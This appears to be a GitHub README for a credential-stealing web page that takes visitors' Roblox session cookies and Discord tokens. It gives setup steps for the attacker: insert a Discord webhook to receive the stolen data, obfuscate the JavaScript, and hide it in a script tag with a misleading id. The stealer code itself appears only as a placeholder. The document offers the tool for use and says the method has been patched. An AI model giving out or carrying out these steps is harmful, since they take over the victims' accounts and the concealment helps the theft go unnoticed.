doritovz / HTML-Method

The HTML method is just a website that grabs your _ROBLOSECURITY cookie, and your Discord token.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

HTML METHOD

WARNING: This method has been patched once Roblox had cross site scripting policy (basically let roblox get embedded, was the main function of the method).

Method Requirements

  • A few braincells
  • Website that you can edit
  • Discord Webhook

Instructions

  • Go to the src.js file, and replace the text that says WEBHOOK inside the quotes with your Discord webhook

  • Obfuscate the Javascript code, you can use the obfuscator here

  • Paste the obfuscated result into the script tag you made

  • Create the id property inside of the <script> tag you made, and set the id to 'ZeroDivisionErrorHandling'

  • Your HTML should look like this now:

    <script id='ZeroDivisionErrorHandling'>
        // OBFUSCATED CODE HERE
    </script>

After this, you should be done, and the method should work.

Made by dorito#9095

About

The HTML method is just a website that grabs your _ROBLOSECURITY cookie, and your Discord token.

License:MIT License


Languages

Language:CSS 48.6%Language:JavaScript 32.0%Language:HTML 19.4%